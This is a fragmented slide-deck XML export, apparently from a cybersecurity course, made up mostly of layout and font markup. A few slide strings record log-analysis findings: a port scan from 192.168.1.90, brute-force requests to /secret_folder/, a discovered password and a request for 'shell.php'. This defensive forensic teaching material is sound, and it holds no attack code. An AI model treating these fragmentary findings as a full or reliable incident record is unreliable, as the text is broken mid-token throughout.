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0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 Thin"/>
      <p:regular r:id="rId29"/>
      <p:bold r:id="rId30"/>
      <p:italic r:id="rId31"/>
      <p:boldItalic r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId33"/>
      <p:boldItalic r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
      <p:italic r:id="rId41"/>
      <p:boldItalic r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Ligh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9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="223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4A5ED31-9146-496D-A2F0-A7DB4BF8CDB4}">
  <a:tblStyle styleId="{94A5ED31-9146-496D-A2F0-A7DB4BF8CD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223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RobotoLight-bold.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Robot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Thin-italic.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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font" Target="fonts/RobotoThin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8798eb4c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Google Shape;1016;g8798eb4c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8623a2bef4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8623a2bef4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8798eb4c4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8798eb4c4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8623a2bef4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8623a2bef4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port scan occurred on 6/14/20 at 6:07 p.m.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993 packets were sent from 192.168.1.90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destination and source ports shown indicate this was a port scan.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8623a2bef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8623a2bef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request occurred on 6/11/20 at 9:13 p.m.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11,913 requests for made for the /secret_folder/ file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g8623a2bef4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8" name="Google Shape;1178;g8623a2bef4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There were 159 requests made before the attack.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There were 62 requests before the attacker discovered the password.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8623a2bef4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8623a2bef4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There were 159 requests made to this directory.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shell.php was the requested file.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8798eb4c44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8798eb4c4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8798eb4c4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8798eb4c4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g8798eb4c44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3" name="Google Shape;1213;g8798eb4c44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8798eb4c44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8798eb4c44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8623a2bef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8623a2bef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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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80f7e6291e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80f7e6291e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8798eb4c4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8798eb4c4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8798eb4c4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" name="Google Shape;1062;g8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8623a2bef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8623a2bef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8623a2bef4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8623a2bef4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6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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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8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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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8.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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38.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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image" Target="../media/image49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42.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59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58.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6.png"/><Relationship Id="rId4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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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8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6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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107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3.png"/><Relationship Id="rId3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. Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2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" name="Google Shape;9;p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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p2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110" y="1231212"/>
            <a:ext cx="2286002" cy="1703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0. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_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1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1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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242550" y="3895344"/>
            <a:ext cx="89079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4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sz="27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8" name="Google Shape;88;p1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9" name="Google Shape;8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963" y="-228600"/>
            <a:ext cx="8535272" cy="406442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/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9144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1. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1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2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" name="Google Shape;96;p12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2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39" l="0" r="0" t="29"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899000" y="1133363"/>
            <a:ext cx="1737360" cy="191109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2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2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1" name="Google Shape;101;p12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2. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3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8275625" y="4154800"/>
            <a:ext cx="594361" cy="65379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5" name="Google Shape;105;p1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2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109" name="Google Shape;109;p1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3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3. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4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4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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph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2"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9" name="Google Shape;119;p14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21" name="Google Shape;12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3900" y="-595025"/>
            <a:ext cx="29503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4. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4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/>
          <p:nvPr>
            <p:ph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4" name="Google Shape;124;p1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5" name="Google Shape;125;p1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15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7" name="Google Shape;127;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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8" name="Google Shape;128;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3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29" name="Google Shape;129;p1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15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31" name="Google Shape;13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13200" y="3862850"/>
            <a:ext cx="656773" cy="114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5. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3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16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="209" r="209" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858369" y="1097625"/>
            <a:ext cx="1737361" cy="198059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6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0" name="Google Shape;140;p16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b="1"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2" name="Google Shape;142;p16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800">
          <p15:clr>
            <a:srgbClr val="F9AD4C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6. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5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5" name="Google Shape;145;p1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6" name="Google Shape;146;p1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7" name="Google Shape;147;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="504" r="504" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257069" y="4200875"/>
            <a:ext cx="548641" cy="62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9" name="Google Shape;149;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2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1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17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2" name="Google Shape;152;p17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005">
          <p15:clr>
            <a:srgbClr val="F9AD4C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7. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7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6" name="Google Shape;156;p1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7" name="Google Shape;157;p1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9" name="Google Shape;159;p1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1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61" name="Google Shape;161;p18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62" name="Google Shape;162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18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65" name="Google Shape;165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" name="Google Shape;167;p18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68" name="Google Shape;168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9" name="Google Shape;169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" name="Google Shape;170;p18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71" name="Google Shape;171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72" name="Google Shape;172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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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4" name="Google Shape;174;p18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 txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233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8" name="Google Shape;178;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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9" name="Google Shape;179;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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8. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4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3" name="Google Shape;183;p1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84" name="Google Shape;184;p1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" name="Google Shape;185;p1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6" name="Google Shape;186;p1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1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88" name="Google Shape;188;p19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189" name="Google Shape;189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9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192" name="Google Shape;192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3" name="Google Shape;193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9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195" name="Google Shape;195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6" name="Google Shape;196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19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198" name="Google Shape;198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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7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1" name="Google Shape;201;p19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9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5" name="Google Shape;205;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2695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6" name="Google Shape;206;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle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07" name="Google Shape;207;p19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208" name="Google Shape;208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9" name="Google Shape;209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9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9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9. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1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5" name="Google Shape;215;p2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16" name="Google Shape;216;p2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8" name="Google Shape;218;p2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2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20" name="Google Shape;220;p20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21" name="Google Shape;221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2" name="Google Shape;222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20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24" name="Google Shape;224;p20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5" name="Google Shape;225;p20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26" name="Google Shape;226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7" name="Google Shape;227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" name="Google Shape;228;p20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" name="Google Shape;229;p20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30" name="Google Shape;230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1" name="Google Shape;231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2" name="Google Shape;232;p20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" name="Google Shape;233;p20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34" name="Google Shape;234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5" name="Google Shape;235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20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7" name="Google Shape;237;p20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38" name="Google Shape;238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9" name="Google Shape;239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20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1" name="Google Shape;241;p20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42" name="Google Shape;242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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075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5" name="Google Shape;245;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075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6" name="Google Shape;246;p20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7" name="Google Shape;247;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="362208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8" name="Google Shape;248;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="4236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. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1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" name="Google Shape;19;p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2" name="Google Shape;22;p3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35" y="1058550"/>
            <a:ext cx="2560322" cy="192023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0. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_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52" name="Google Shape;252;p2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53" name="Google Shape;253;p2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4" name="Google Shape;254;p2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55" name="Google Shape;255;p2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2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57" name="Google Shape;257;p21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58" name="Google Shape;258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9" name="Google Shape;259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21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225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1" name="Google Shape;261;p21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" name="Google Shape;262;p21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63" name="Google Shape;263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4" name="Google Shape;264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" name="Google Shape;265;p21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1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67" name="Google Shape;267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8" name="Google Shape;268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21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21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71" name="Google Shape;271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2" name="Google Shape;272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21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" name="Google Shape;274;p21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75" name="Google Shape;275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6" name="Google Shape;276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21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8" name="Google Shape;278;p21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79" name="Google Shape;279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0" name="Google Shape;280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21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1858813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2" name="Google Shape;282;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12250" y="24399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3" name="Google Shape;283;p21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4" name="Google Shape;284;p21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5" name="Google Shape;285;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150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1. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="11616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9" name="Google Shape;289;p2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90" name="Google Shape;290;p2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2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2" name="Google Shape;292;p2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" name="Google Shape;293;p2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94" name="Google Shape;294;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="295" name="Google Shape;29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6" name="Google Shape;29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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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98" name="Google Shape;298;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="16842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22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Google Shape;30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01" name="Google Shape;30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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125" y="16979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3" name="Google Shape;303;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="220740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4" name="Google Shape;304;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="305" name="Google Shape;30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06" name="Google Shape;30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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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8" name="Google Shape;308;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="27300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22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="310" name="Google Shape;31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1" name="Google Shape;31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2" name="Google Shape;312;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="27437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13" name="Google Shape;313;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="32526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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Google Shape;31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6" name="Google Shape;31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" name="Google Shape;317;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="32663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18" name="Google Shape;318;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="377527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22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Google Shape;32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1" name="Google Shape;32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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="378897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3" name="Google Shape;323;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="43234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" name="Google Shape;324;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Google Shape;32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6" name="Google Shape;32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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="43371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2. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1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30" name="Google Shape;330;p2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31" name="Google Shape;331;p2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2" name="Google Shape;332;p2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3" name="Google Shape;333;p2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" name="Google Shape;334;p2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35" name="Google Shape;335;p23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6" name="Google Shape;336;p23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37" name="Google Shape;33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8" name="Google Shape;33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" name="Google Shape;339;p23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0" name="Google Shape;340;p23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Google Shape;341;p23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42" name="Google Shape;34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3" name="Google Shape;34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23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5" name="Google Shape;345;p23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6" name="Google Shape;346;p23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47" name="Google Shape;34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8" name="Google Shape;34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" name="Google Shape;349;p23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0" name="Google Shape;350;p23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" name="Google Shape;351;p23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52" name="Google Shape;35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3" name="Google Shape;35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23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5" name="Google Shape;355;p23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" name="Google Shape;356;p23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357" name="Google Shape;35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8" name="Google Shape;35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" name="Google Shape;359;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="21353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60" name="Google Shape;360;p23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" name="Google Shape;361;p23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362" name="Google Shape;36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3" name="Google Shape;36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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1225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65" name="Google Shape;365;p23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6" name="Google Shape;366;p23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367" name="Google Shape;36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8" name="Google Shape;36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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="12590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0" name="Google Shape;370;p23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" name="Google Shape;371;p23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372" name="Google Shape;37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3" name="Google Shape;37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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1697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3. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1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7" name="Google Shape;377;p2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78" name="Google Shape;378;p2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9" name="Google Shape;379;p2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0" name="Google Shape;380;p2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2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2" name="Google Shape;382;p24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24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84" name="Google Shape;38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5" name="Google Shape;38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6" name="Google Shape;386;p24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7" name="Google Shape;387;p24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8" name="Google Shape;388;p24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89" name="Google Shape;38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0" name="Google Shape;39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" name="Google Shape;391;p24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2" name="Google Shape;392;p24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3" name="Google Shape;393;p24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94" name="Google Shape;39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5" name="Google Shape;39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6" name="Google Shape;396;p24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7" name="Google Shape;397;p24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8" name="Google Shape;398;p24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99" name="Google Shape;39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0" name="Google Shape;40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1" name="Google Shape;401;p24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02" name="Google Shape;402;p24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3" name="Google Shape;403;p24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404" name="Google Shape;40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5" name="Google Shape;40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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
